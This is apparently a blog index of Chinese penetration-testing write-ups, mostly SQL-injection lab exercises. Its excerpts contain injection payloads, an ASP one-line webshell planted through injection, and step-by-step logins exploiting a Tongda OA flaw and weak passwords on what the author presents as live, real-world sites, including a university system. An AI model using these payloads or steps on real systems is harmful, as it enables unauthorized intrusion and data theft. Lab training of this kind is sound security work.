
漏洞/靶场操作记录
文章平均质量分 63
chick&
暗夜里的光
展开
-
常用注入语句分享——<sql注入>
//看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --原创 2021-10-08 20:45:02 · 288 阅读 · 0 评论 -
细心——<漏洞实战>
这不是刚起床嘛。那就活动活动筋骨把~~~这后台乍一看像是良精的程序。Admin admin弱口令进入之。可是仔细看了一下。并没有良精后台传说中的页面,,连良精的通杀拿shell的配置页面/admin/SiteConfig.asp都消失的无影无踪。我估计这是良精的改版或者页面被管理员删除了。看到一上传页面。抓包上传之。可是不管是用神马类型的方式上传。显示的结果都是gif后缀。这时候翻到文件上传管理,发现了文件管理中有asp的文件。访问之确实是我刚才上传的小马.原创 2021-10-08 20:38:25 · 1516 阅读 · 0 评论 -
记一次通达oa17版漏洞<某高校使用中系统>
前几天无聊FOFA搜了一下通达oa17版本的指纹。意外发现漏洞URL漏洞详情http://222.XXXX:post/存在通达OA任意用户登录,可以拿到管理员权限,进而获得进一步深入操作在http://222. 222.XXXX:post//处输入admin/admin并抓包1、首行的地址改为/logincheck_code.php2、删除Cookie一行3、尾行最后加上&UID=1成功获取到管理员的cookie值访问:http://...原创 2021-09-29 22:42:24 · 522 阅读 · 0 评论 -
post/get注入——靶场操作记录<掌控安全>
post注入第一题——————————分析靶场——————————发现区别怎么没有id=1?没有那我自己输入试一下看行不行得出答案……不行post & get 区别一get 会进行url编码再次寻找用户可以自己输入数据的地方尝试万能密码登录试一下发现界面发生变化————————————————尝试注入———————————————再次输入其他信息试一下发现输入内容被两个单引号所闭合这会造成输入内容当成字符串,而不是代码原创 2021-09-28 15:46:54 · 502 阅读 · 0 评论 -
sql显错注入——靶场操作记录<掌控安全>
掌控安全学院SQL注入靶场存在index.php? 前几节课讲过?一般为get传参!当然界面上也说了————————————————开始尝试——————————————1.判断是否存在注入当输入id=2时页面发生变化再继续掌控安全学院SQL注入靶场当加上条件and1=2时界面不显示(报错)基本确定存在注入————————————————判断字段数——————————————掌控安全学院SQL注入靶场输入order by 4 之后原本显示正常的界面显示不正常!判断当前表中字段.原创 2021-09-28 15:41:01 · 2667 阅读 · 1 评论 -
正则表达式——靶场操作记录<掌控安全>
——————————————分析flag代码————————————//告诉这是PHP咯<?php$key=’flag{**}’;$Regular= preg_match(“/zkaq.key.{2,9}:\/.\/(keykey)/i”, trim($_GET[“id”]), $match);if( $Regular ){die(‘key: ‘.$key);} //if结尾咯(但是为什么没有‘?>’结尾呢)——————————————分析flag代码2————————————原创 2021-09-28 15:30:21 · 206 阅读 · 0 评论 -
越权——漏洞操作记录<掌控安全>
越权漏洞越权分为两种:一种为水平越权,一种为垂直越权。水平越权:指同权限之间能相互修改或查看对方的资料(比如:同为用户 用户A可以查看用户B的资料)垂直越权:指低权限用户能够修改或查看高权限用户的资料(比如:用户组A能够拥有管理组B的权限)进入靶场http://117.41.229.122:8002此处提供注册(不能提供注册的利用信息收集)先注册两个账号用户1:twalone用户2: twalone1先进行两个号的水平越权使用BurpSui...原创 2021-09-27 21:32:43 · 298 阅读 · 0 评论 -
密码找回漏洞—靶场操作<掌控安全>
这题主要就是绕过验证码来到靶场根据靶场提示访问:http://117.41.229.122:8010/hahq_Admin/?umail=408362692@qq.com&type=ok发现是一个重置密码的页面我们把这题的源码下载下来进行审计全局搜索里搜:密码找回通过审计发现,$fsjs=rand(10,10000)随机生成认证码,只有认证码一样就可以重置密码我么通过抓包进行爆破爆破成功...原创 2021-09-27 21:24:40 · 696 阅读 · 0 评论 -
SQL过滤字符后手工注入漏洞测试(第2题)——<墨者学院漏洞记录>
http://219.153.49.228:40519/new_list.php?id=1http://219.153.49.228:40519/new_list.php?id=1'http://219.153.49.228:40519/new_list.php?id=1'%23http://219.153.49.228:40519/new_list.php?id=1' and 1=1经过上面几轮测试,可以看出本题:空格,单引号,等号,union,select,from都过滤。因此进行替换:原创 2021-07-16 15:16:32 · 245 阅读 · 2 评论 -
SQL注入漏洞测试(delete注入)——<墨者学院漏洞记录>
1、 打开链接界面,可以自行测试留言2、 提交留言,查看网页源代码3、在浏览器中自行添加后缀,并使用单引号测试注入点,发现存在报错行注入,报错型注入的方法大概有10种左右,这里分别使用floor、updatexml和extractvalue三种常用的方法。4、 使用extractvalue注入方法获取当前数据库信息注入语句:and (extractvalue(1, concat(0x5c,(select database()))))报错反馈得出数据库名称为原创 2021-07-16 15:14:01 · 449 阅读 · 1 评论 -
SQL注入实战(防注入)-Access<墨者学院漏洞操作记录>
1、 打开靶场拿御剑扫秒后台百度得知所有记录会保存在sqlin.asp的目录2、 插入一句话木马 <%eval request(“user”)%>http://219.153.49.228:47828/news.asp?id=1%20and%201=%3C%eval%20request(%22user%22)%%3E3、 对木马进行URLencode使用菜刀连接并找到key;...原创 2021-07-16 15:06:49 · 352 阅读 · 0 评论 -
SQL过滤字符后手工绕过漏洞测试(万能口令)
根据提示,在登录页面输入用户名为 admin' 密码随意:点击登录,出现错误,发现错误提示:根据错误提示,修改注入语句,密码随意:点击“确认登录”,获得KEY:常用万能密码:https://blog.youkuaiyun.com/zz_Caleb/article/details/85063283...原创 2021-07-16 14:53:17 · 441 阅读 · 0 评论 -
SQL过滤字符后手工注入漏洞测试(第3题)-墨者学院漏洞操作记录
打开漏洞地址http://219.153.49.228:41317/new_list.php?id=1,加入单引号,页面报错:order by 确定只有7列:联合查询可知2,3,4可以利用:爆出当前数据库和用户:爆出该数据库下的表:爆出stormgroup_member表下的字段:爆出username和password字段内容:然后进行解密。尝试得出正确的账户密码...原创 2021-07-16 14:49:08 · 105 阅读 · 0 评论 -
SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录
一进来看到一个停机公告,点开查看发现链接中有字符参数,怀疑存在字符型注入输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1' and '1'='2发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。通过order by 子句判断字段数order by 1order by 2order by 5order by 4当order by 4 时网页正常响应,by 5时原创 2021-07-16 14:44:46 · 466 阅读 · 1 评论 -
sql(时间盲注)——墨者学院——漏洞操作记录
Sql时间盲注1、 开始的页面,但是不是这个页面,点击下面的任性网页2、提示再url中传参,加个逗号 ?type=1’既然提示是时间盲注,那就?type=1’ and sleep(5)%23没有时间延迟去掉单引号有时间延迟5秒因为是时间延迟,没有任何回显,那只能用python写脚本或者用sqlmap这里是脚本,但是后面有错误,我找不到原因,只能查到flag、goods表的字段import requests import datetime i原创 2021-07-16 14:40:43 · 270 阅读 · 0 评论 -
SQL注入漏洞测试(HTTP头注入)——操作记录
burp抓包判断注入位置,回显正常有报错,存在注入点确认列数确认返回位置查询当前数据库以及数据库版本返回库名:pentesterlabunion select 1,2,3,(select group_concat(table_name) from information_schema.tables where table_schema=database())表名:comment,flag,go原创 2021-07-16 14:27:02 · 195 阅读 · 0 评论 -
宽字节注入——漏洞记录
宽字节注入已知目标IP为:http://219.153.49.228:41742/new_list.php?id=1,加入单引号后页面并没有报错加上%df,可以看到页面报错,说明是单引号闭合:后面跟上正常sql注入语句即可,order by判断列数,为5时返回正常:为6时,返回报错:联合查询,看到3和5可利用:查询当前数据库和用户:查询表格:查询stormgroup_member原创 2021-07-07 15:15:50 · 339 阅读 · 0 评论 -
显错注入——漏洞记录
sql注入漏洞测试(报错注入)访问靶场,又看到通知栏的滚动条查看url ?id=1 是不是很惊喜。这个东西get传参。直接在url中操作:’ , ‘ and 1=1 或者 ’and 1=2 注意可以加上--+注释看一下字段数 order by 5 的时候出现页面报错说明四个字段,尝试union select系统过滤了我们输入的union。怎么办,考虑绕过过滤:大小写,字符串编码大小写混用,绕过过滤。并获得显错位置接下来就是常规操作id=-1原创 2021-07-07 15:01:27 · 121 阅读 · 0 评论 -
盲注——漏洞/靶场操作记录
SQL注入漏洞测试(布尔盲注)——解题记录打开靶场界面先简单查看url,在输入框输入东西。都没有反应。看到下方滚动条,点击后页面跳转。查看url,对url进行简单的漏洞测试,发现页面只有T/F。盲注存在!对于盲注最快的无非是sqlmapsqlmap -U --batch --dbs .......password 密文 可尝试各种解密。一般md5完成布尔盲注难点:找注入点,细心。技术特点:手工注入只能返回T/F ,需要猜!什么是盲注原创 2021-07-07 14:33:55 · 239 阅读 · 0 评论 -
漏洞操作记录—— X-Forwarded-For 注入漏洞实战
墨者学院 X-Forwarded-For 注入漏洞实战——解题思路打开漏洞靶场链接随便输入账号密码点击登录出现弹窗弹窗显示IP地址用burp抓一个包看看流量包中发现X -forwarded-for: 缺失把抓到的包发送到repeater中,在请求头中增加X-Forwarded-For: ' 发现报错还可改为127.0.0.1'尝试用字符看看能不能闭合尝试闭合成功,很明显常见字符型注入尝试爆数据库库database..原创 2021-07-07 11:10:56 · 945 阅读 · 1 评论